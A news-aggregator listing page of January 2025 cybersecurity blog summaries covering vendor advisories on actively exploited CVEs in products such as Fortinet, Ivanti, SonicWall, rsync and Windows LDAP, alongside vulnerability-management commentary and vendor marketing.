Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

January 2025

Arctic Wolf

Arctic Wolf Observes Campaign Exploiting SimpleHelp RMM Software for Initial Access

Jan 24, 2025 By Andres Ramos In Arctic Wolf
On January 22, 2025, Arctic Wolf began observing a campaign involving unauthorized access to devices running SimpleHelp RMM software as an initial access vector. Roughly a week prior to the emergence of this campaign, several vulnerabilities had been publicly disclosed in SimpleHelp by Horizon3 (CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728).
Read Post
Arctic Wolf

CVE-2025-23006: Actively Exploited Vulnerability in SonicWall SMA1000 Appliances

Jan 23, 2025 By Julian Tuin In Arctic Wolf
On January 22, 2025, SonicWall published a security advisory detailing an actively exploited remote command execution vulnerability in SMA1000 appliances. The critical-severity vulnerability, CVE-2025-23006, is a pre-authentication deserialization of untrusted data vulnerability that has been identified in the SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC). If exploited, it could allow unauthenticated remote threat actors to execute arbitrary OS commands.
Read Post
securitysenses

AI-Powered Attacks Surge: 1,025% Jump in Vulnerabilities, 99% are API related

Jan 23, 2025 By SecuritySenses In SecuritySenses
Wallarm's 2025 API ThreatStats Report offers a sweeping look at how AI deployments drive a surge in security risks. In 2024, Wallarm researchers discovered 439 AI-related CVEs-up an astonishing 1,025% from the prior year. Nearly all these flaws, 99%, point back to insecure or mismanaged APIs.
Read Post
Featured Post
ThreatQuotient

Taking a Threat Adapted Approach to Vulnerability Management

Jan 22, 2025 By Chris Jacob, VP and Will Baxter, Security Engineer In ThreatQuotient
As cyber threats continue to grow in complexity and frequency, vulnerability management requires more than just patching systems; it demands a dynamic, threat-adapted approach. As part of Cyber Rhino Threat Week (9-13th of December 2024) which aimed to inform, sharing threat intelligence insights and best practices with our customers, partners and industry ecosystem, we held a session that explored how integrating Threat Intelligence into Vulnerability Management can transform the way organisations prioritise and respond to risks.
Read Post
nucleus

Stop Demonizing CVSS: Fix the Real Problem

Jan 22, 2025 By Scott Kuffer In Nucleus
If you read the newest risk-based vulnerability management literature, it appears we have a new favorite punching bag: the Common Vulnerability Scoring System (CVSS). You seemingly can’t throw a rock into the “vuln-o-sphere” without hitting someone dunking on CVSS or the National Vulnerability Database (NVD). The argument goes something like this: “Exploitation rates are up, ransomware is surging, and vulnerabilities are multiplying like rabbits.
Read Post
Pentest People

How Vulnerability Assessments Help Identify and Address Security Weaknesses

Jan 21, 2025 By Kate Watson In Pentest People
A vulnerability assessment systematically evaluates the security of an organisation’s IT infrastructure, aiming to uncover potential flaws. This process not only identifies weaknesses but also provides a roadmap for addressing these vulnerabilities before they are exploited by malicious actors. Through a series of structured steps, including identification, classification, analysis, and remediation, organisations can significantly enhance their cyber security posture.
Read Post
cyjax

ConVErsations: Criminal Discussion of Vulnerabilities and Exploits

Jan 17, 2025 By Jovana Macakanja In CYJAX
Defenders often discuss security vulnerabilities on GitHub, Stack overflow, X (formerly Twitter), and other platforms to share knowledge of these threats and ensure users know when patches are available. Cybercriminals have a similar process, choosing to share vulnerability news, exploit code, and engage in technical discussions on cybercriminal forums. However, in contrast to defenders, these threat actors share this knowledge for the purpose finding unpatched systems and exploiting them.
Read Post
sysdig

Detecting and mitigating CVE-2024-12084: rsync remote code execution

Jan 17, 2025 By Sysdig Threat Research Team In Sysdig
On Tuesday, January 14, 2025, a set of vulnerabilities were announced that affect the “rsync” utility. Rsync allows files and directories to be flexibly transferred locally and remotely. It is often used for deployments and backup purposes. In total, 6 vulnerabilities were announced to the OSS Security mailing list. The most severe vulnerability, CVE-2024-12084, may result in remote code execution. This post will cover how to detect and mitigate CVE-2024-12084.
Read Post
foresiet

Microsoft Corporation Latest Security Update on Actively Exploited Zero-Day Flaws for Safer Digital Operations

Jan 17, 2025 By Foresiet In Foresiet
Organizations need to be watchful and vigilant with their cyber space because cyber threats keep on evolving. And, in fact, urgency is provided by the security update of January 2025 from Microsoft, which patches at least 161 vulnerabilities, including three zero-day flaws actively exploited in the wild.
Read Post
kroll

Fortinet Discloses Active Exploitation of Critical Zero-Day Vulnerability: CVE-2024-55591

Jan 17, 2025 By Kroll In Kroll
Note: These vulnerabilities remain under active exploitation and Kroll experts are investigating. If further details are uncovered by our team, updates will be made to the Kroll Cyber Risk blog. A critical authentication bypass vulnerability (CWE-288) affecting FortiOS and FortiProxy (FG-IR-24-535) allows remote attackers to obtain super admin privileges via Node.js WebSocket traffic.
Read Post
cycognito

Emerging Threat: Fortinet CVE-2024-55591

Jan 16, 2025 By Emma Zaballos In CyCognito
On January 14, 2025, Fortinet disclosed a new critical (CVSS 9.6) authentication bypass vulnerability affecting FortiOS and FortiProxy. This vulnerability, CVE-2024-55591, allows unauthenticated remote attackers to target the Node.js WebSocket module of the administrative interface and potentially gain super-admin privileges.
Read Post
centripetal

Security Bulletin: CVE-2024-55591 Fortinet - Authentication Bypass

Jan 16, 2025 By Bruce Skillern In Centripetal
On January 14, 2025 Fortinet confirmed a critical zero-day vulnerability, CVE-2024-55591, in Fortinet’s FortiOS and FortiProxy systems that has been actively exploited in the wild. This authentication bypass vulnerability allows attackers to gain super-admin privileges via crafted requests to the Node.js WebSocket module, enabling unauthorized access to firewalls, rogue administrative account creation, and configuration changes.
Read Post
apono

Aviatrix Controller RCE Vulnerability Allows Unauthenticated Malicious Code Injections (CVE-2024-50603)

Jan 16, 2025 By Gabriel Avner In Apono
AWS and other cloud infrastructure exposed to after attacks uncovered in the wild Cloud networking solutions provider Aviatrix has published a new vulnerability (CVE-2024-50603) in its controller. This vulnerability allows unauthenticated actors to run arbitrary commands. This Remote Code Execution (RCE) vulnerability, rated CVSS 10 (critical), has been exploited in the wild. A patch is already available on GitHub. Alternatively, users can update to the secure versions 7.1.4191 or 7.2.4996.
Read Post
Spectral

A Step-by-Step Guide to the Remote Code Execution Vulnerability

Jan 16, 2025 By Eyal Katz In Spectral
What if the very core of your company—the digital ecosystem you painstakingly built—is under attack? If an invisible enemy gets illegal access and begins manipulating data or disrupting essential processes, your entire organization could be paralyzed in an instant. Remote Code Execution (RCE) vulnerabilities have this terrifying reality. RCEs are the holy grail for hackers, allowing them to run arbitrary commands on a target machine.
Read Post
Arctic Wolf

Multiple Vulnerabilities in Rsync Could be Combined to Achieve RCE

Jan 16, 2025 By Julian Tuin In Arctic Wolf
On January 14, 2025, the CERT Coordination Center (CERT/CC) published a security advisory detailing multiple vulnerabilities impacting Rsync. The most severe vulnerability is CVE-2024-12084, a critical severity heap buffer overflow vulnerability in the Rsync daemon which can lead to out-of-bounds writes in the buffer.
Read Post
Arctic Wolf

CVE-2024-55591: Follow up: Authentication Bypass Vulnerability in Fortinet FortiOS and FortiProxy

Jan 15, 2025 By Julian Tuin In Arctic Wolf
On January 14, 2025, Fortinet published a security advisory for CVE-2024-55591, an authentication bypass using an alternate path or channel vulnerability in FortiOS and FortiProxy. A remote threat actor can craft requests to the Node.js websocket module to gain super-admin privileges.
Read Post
upguard

Mitel MiCollab Vulnerabilities: CVE-2024-35286 and CVE-2024-41713

Jan 15, 2025 By UpGuard Team In UpGuard
Mitel’s MiCollab Unified Communications solutions are widely used by businesses to streamline communications. However, two critical vulnerabilities, CVE-2024-35286 and CVE-2024-41713, have been identified across several versions of Mitel MiCollab. CVE-2024-35286 has been identified in versions 9.8.0.33 and earlier and CVE-2024-41713 has been identified in versions 9.8 SP1 FP2 (9.8.1.201) and earlier.
Read Post
Snyk

Snyk Security Labs Testing Update: Cursor.com AI Code Editor

Jan 14, 2025 By Danny Allan In Snyk
Snyk’s Security Labs team aims to find and help mitigate vulnerabilities in software used by developers around the world, with an overarching goal to improve the state of software security. We do this by targeting tools developers are using, including new and popular software solutions. With the meteoric rise in AI tooling – specifically the fast-growing field of AI-enabled development environments – we have been including such software in our research cycles.
Read Post
Snyk

Snyk Recognized as Trusted Partner and Innovator by JPMorganChase

Jan 14, 2025 By Ken Mellert In Snyk
Snyk is the trusted partner for financial services companies, empowering them to modernize application security while safeguarding critical infrastructure. Backed by industry leaders, we are committed to exceeding expectations, driving innovation, and redefining security for financial services. This is one of the reasons Snyk was recently inducted into JPMorgan Chase’s Hall of Innovation, for our central role in helping them to build the future of banking securely.
Read Post
cloudflare

Demonstrating reduction of vulnerability classes: a key step in CISA's "Secure by Design" pledge

Jan 14, 2025 By Sri Pulla In Cloudflare
In today’s rapidly evolving digital landscape, securing software systems has never been more critical. Cyber threats continue to exploit systemic vulnerabilities in widely used technologies, leading to widespread damage and disruption. That said, the United States Cybersecurity and Infrastructure Agency (CISA) helped shape best practices for the technology industry with their Secure-by-Design pledge.
Read Post
aikido

Your Client Requires NIS2 Vulnerability Patching. Now What?

Jan 14, 2025 By Mackenzie Jackson In Aikido
TL;DR: The new EU cybersecurity directive, NIS2, is already reshaping how software suppliers do business through stricter vulnerability management requirements in procurement contracts. This shift is gaining momentum, and more companies will need to adapt. Aikido helps automate compliance reporting and vulnerability tracking to meet these new demands. Start your free compliance journey here, or read on to understand what this means for your business.
Read Post
Trustwave

CVE-2024-55591: Fortinet FortiOS/FortiProxy Zero Day

Jan 14, 2025 By Trustwave In Trustwave
In late November and December 2024, Arctic Wolf observed evidence of a mass compromise of Fortinet FortiGate. While the initial attack vector was unknown at the time, evidence of compromise (with new users and SSL profiles) was consistent across compromised devices. On January 14, Fortinet released a formal statement and patch. The vulnerability is an Authentication Bypass via crafted requests to Node.js websocket module and issued CVE-2024-55591. The CVSSv3 score is 9.6.
Read Post

How Attackers Exploit APIs for Rapid Data Breaches #Vulnerabilities #TechTrends #CyberThreats

Jan 13, 2025 By Wallarm In Wallarm
Attackers now exploit APIs for rapid data breaches, taking advantage of a 96% rise in API-related vulnerabilities. Learn how realized risks (breaches) differ from unrealized risks (vulnerabilities) and why APIs are top targets. Stay informed on API security trends.
View Video
outpost 24

CISO predictions: What does 2025 hold for attack surface management (ASM)?

Jan 13, 2025 By Marcus White In Outpost 24
We’ve asked Outpost24’s CISO, Martin Jartelius, what 2025 is likely to hold for organizations using attack surface management (ASM) tools. Here’s what Martin had to say about what he predicts for ASM in 2025, as well as some thought on how the CISOs role might change.
Read Post
cycognito

Emerging Threat: Ivanti Connect Secure CVE-2025-0282 and CVE-2025-0283

Jan 13, 2025 By Emma Zaballos In CyCognito
On Wednesday, January 8th, Ivanti disclosed two severe vulnerabilities affecting Ivanti Connect Secure VPN devices. Ivanti Connect Secure is an external-facing SSL VPN used to secure remote access to corporate networks. Ivanti Policy Secure is an internal network-access control solution designed for regulating access within an enterprise’s network. The critical vulnerability (CVSS 9.0) CVE-2025-0282 allows unauthenticated remote code execution (RCE) through a stack-based buffer overflow.
Read Post
tripwire

What Is Vulnerability Management?

Jan 13, 2025 By Brandon Barrett In Tripwire
Enterprise networks frequently experience changes in endpoint devices, software, and files, which can introduce risk to the organization. To mitigate this, companies can implement foundational security controls like file integrity monitoring (FIM), which tracks changes to essential files and helps restore them if unauthorized. Additionally, organizations may use these controls to monitor for vulnerabilities introduced by new devices. However, FIM alone is not enough.
Read Post
mend

CVSS 3.1 vs CVSS 4.0: A Look at the Data

Jan 13, 2025 By Aurora Starita In Mend
Like the cost of groceries and everything else, CVSS scores seem to have experienced some inflation recently. CVSS 4.0 promises to be a better calculator of risk than previous iterations of the system, but that’s only true if you use it in its full capacity to calculate your specific risk within your specific environment. Most of us aren’t using it that way.
Read Post
kroll

Ivanti Discloses Active Exploitation of Zero-Day Vulnerability

Jan 10, 2025 By Kroll In Kroll
Ivanti has disclosed vulnerabilities affecting Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) and Ivanti Neurons for Zero Trust Access (ZTA) Gateways. According to Ivanti, CVE-2025-0282 has been exploited on a limited number of ICS appliances. There are no confirmed reports of exploitation for Ivanti Policy Secure or ZTA Gateways. There is no indication that CVE-2025-0283 is actively exploited or chained.
Read Post
Trustwave

Why Vulnerability Scanning Alone Isn't Enough: The Case for Penetration Testing

Jan 10, 2025 By Grayson Lenik In Trustwave
Organizations today face a rapidly evolving threat landscape, and as they plan their cybersecurity strategy and budgets, many may struggle with a key question: If I’m conducting regular vulnerability scans, and patching the vulnerabilities I identify, do I really need penetration tests as well? The answer is yes. While vulnerability scanning plays a vital role in identifying risks and vulnerabilities, relying solely on it for security creates blind spots.
Read Post
Snyk

Securing GenAI Development with Snyk

Jan 9, 2025 By Liqian Lim () In Snyk
From design to deployment, the rise in AI tools and AI-generated code is changing developers’ workflows, enabling them to focus on more creative and complex tasks. However, while 96% of developers use AI coding assistants to streamline their work, it can have a negative impact on security teams. One-fifth of AppSec teams surveyed said they face significant challenges securing AI-generated code due to how quickly it’s produced.
Read Post
Arctic Wolf

CVE-2025-0282: Critical Zero-Day Remote Code Execution Vulnerability Impacts Several Ivanti Products

Jan 9, 2025 By Andres Ramos In Arctic Wolf
On January 8, 2025, Ivanti published a security advisory announcing the patching of a critical, actively exploited vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateways. Tracked as CVE-2025-0282, the vulnerability allows remote unauthenticated threat actors to achieve remote code execution (RCE) via a stack-based buffer overflow flaw. Ivanti confirmed that exploitation has only been observed in Connect Secure, and no exploitation has been reported in Policy Secure or ZTA Gateways.
Read Post
manageengine

Notable zero-day vulnerability trends in 2024: Insights and implications

Jan 8, 2025 By Patch Manager Plus In ManageEngine
2024 has seen a significant uptick in the discovery and exploitation of zero-day vulnerabilities. These unpatched security flaws present a serious challenge to cybersecurity teams, as attackers can exploit them before any patches are available. As a result, zero-day vulnerabilities have become a go-to tool for cybercriminals aiming to infiltrate enterprise networks.
Read Post
cycognito

Emerging Threat: Windows LDAP CVE-2024-49113

Jan 8, 2025 By Emma Zaballos In CyCognito
CVE-2024-49113, also known as LDAPNightmare, is a high severity (CVSS score of 7.5) unauthenticated Denial of Service (DoS) vulnerability in Windows Lightweight Directory Access Protocol (LDAP). This vulnerability allows attackers to crash any unpatched Windows server with an internet-accessible DNS server by overwhelming a critical internal component of the operating system. Both CVE-2024-49113 and its relative, the critical RCE vulnerability CVE-2024-49112, were publicized in December 2024.
Read Post
tripwire

CIS Control 07: Continuous Vulnerability Management

Jan 8, 2025 By Matthew Jerzewski In Tripwire
When it comes to cybersecurity, vulnerability management is one of the older technologies that still play a critical role in securing our assets. It is often overlooked, disregarded, or considered only for checkbox compliance needs, but a proper vulnerability management program can play a critical role in avoiding a series of data breaches. CIS Control 07 provides the minimum requirements and table stakes, if you will, for establishing a successful vulnerability management program.
Read Post
astra

Stored XSS Vulnerability Discovered in Joomla 5.1.4 - CVE-2024-40748

Jan 8, 2025 By Aakanksha Khanna In Astra
On September 19th, 2024, a critical vulnerability (CVE-2024-40748) was discovered in Joomla version 5.1.4, exposing their website to stored cross-site scripting (XSS) attacks. Stored cross-site scripting (second-order or persistent XSS) arises when an application receives data from an untrusted source and unsafely includes it within its later HTTP responses. This could lead to attackers injecting malicious scripts into the website, which would be executed whenever a user visits a specific page.
Read Post
Snyk

10 Docker Security Best Practices

Jan 8, 2025 By Liran Tal In Snyk
Docker security refers to the build, runtime, and orchestration aspects of Docker containers. It includes the Dockerfile security aspects of Docker base images, as well as the Docker container security runtime aspects—such as user privileges, Docker daemon, proper CPU controls for a container, and further concerns around the orchestration of Docker containers at scale. The state of Docker container security unfolds into 4 main Docker security issues.
Read Post
Snyk

Securing the Digital Future: AppSec Best Practices in Digital Banking

Jan 6, 2025 By Hiroko Nakano In Snyk
On November 12th, 2024, at the Pavilion Hotel in Kuala Lumpur, Snyk’s Field CTO, Pas Apicella, delivered an insightful presentation at the Digital Banking Asia Summit 2024 in Malaysia. Titled, ‘Securing the Digital Future: Best Practices for Application Security in Digital Banking’, his talk focused on actionable strategies to address pressing challenges in the financial services industry.
Read Post
nucleus

Looking Back: What We Learned in 2024

Jan 6, 2025 By Corey Tomlinson In Nucleus
Looking back on 2024 to start the new year, we had the great opportunity to host and be part of several conversations and demonstrations that we hope were valuable learning opportunities for everyone who joined us. Let’s take a moment to review some of the highlights from those 2024 events before we leap into 2025.
Read Post
cato networks

Cato CTRL Threat Brief: CVE-2024-49112 and CVE-2024-49113 - Windows LDAP Vulnerabilities ("LDAPBleed" and "LDAPNightmare")

Jan 3, 2025 By Dolev Moshe Attiya In Cato Networks
In a world where dozens of CVEs are released every day, there are vulnerabilities, and there are vulnerabilities. The latest Microsoft Windows LDAP (Lightweight Directory Access Protocol) vulnerabilities, which were coined not once but twice (“LDAPBleed” and “LDAPNightmare”), clearly belong to the shortlist of new and dangerous CVEs.
Read Post
foresiet

Palo Alto Networks Releases Critical Update for PAN-OS DoS Vulnerability

Jan 2, 2025 By Foresiet In Foresiet
Cybersecurity authorities continuously grapple with the challenges posed by sophisticated cyberattacks. Palo Alto Networks has lately preached a critical denial-of-service (DoS) vulnerability in its PAN-OS software. Tracked as CVE-2024-3393, this critical vulnerability (CVSS score: 8.7) poses serious risks to enterprises relying on PAN-OS and Prisma Access for their cybersecurity infrastructure.
Read Post
outpost 24

Threat Context Monthly: Executive intelligence briefing for December 2024

Jan 2, 2025 By KrakenLabs In Outpost 24
Welcome to the Threat Context Monthly blog series where we provide a comprehensive roundup of the most relevant cybersecurity news and threat information from KrakenLabs, Outpost24’s cyber threat intelligence team. Here’s what you need to know from December.
Read Post
outpost 24

How to protect your site from subdomain takeover

Jan 2, 2025 By Marcus White In Outpost 24
Subdomain takeover is a serious risk for organizations with a large online presence (which is a lot of businesses in 2025!). A domain name is the starting point of your company’s online identity, encompassing the main and subsidiary websites—serving as the organization’s business card, storefront, and a central hub for commercial activities. For SaaS providers and tech solution vendors, domains also form a critical component of their product offerings.
Read Post
safebreach

LDAPNightmare: SafeBreach Labs Publishes First Proof-of-Concept Exploit for CVE-2024-49113

Jan 1, 2025 By Or Yair In SafeBreach
SafeBreach Labs Researchers have developed a zero-click PoC exploit that crashes unpatched Windows Servers using the Windows Lightweight Directory Access Protocol (LDAP) remote code execution vulnerability. Active Directory Domain Controllers (DCs) are considered to be one of the crown jewels in organizational computer networks. Vulnerabilities found in DCs are usually much more critical than those found in usual workstations.
Read Post
Snyk

New year, new security goals: Improve your AppSec in 2025

Jan 1, 2025 By Mariah Gresham In Snyk
As the clock ticks closer to 2025, we’re all trying to brainstorm goals and resolutions for the new year. But unlike the annual pledge to exercise more and eat fewer sweets around the holidays (whoops), application security is one area where nobody can afford to slip up. Let’s skip the procrastination phase and hit the ground running with some practical New Year’s resolutions that will help you step up your AppSec game.
Read Post
astra

What Is Vulnerability Scanning? (Comprehensive Guide)

Jan 1, 2025 By Ananda Krishna In Astra
Vulnerability scanning is the process of assessing web applications, mobile apps, APIs, systems, networks, or cloud infrastructures to identify security weaknesses. It uses automated tools to detect known CVEs (Common Vulnerabilities and Exposures), misconfigurations, and potential attack vectors, helping to secure assets against cyber threats.
Read Post

Copyright © 2024 OpsMatters™. All rights reserved.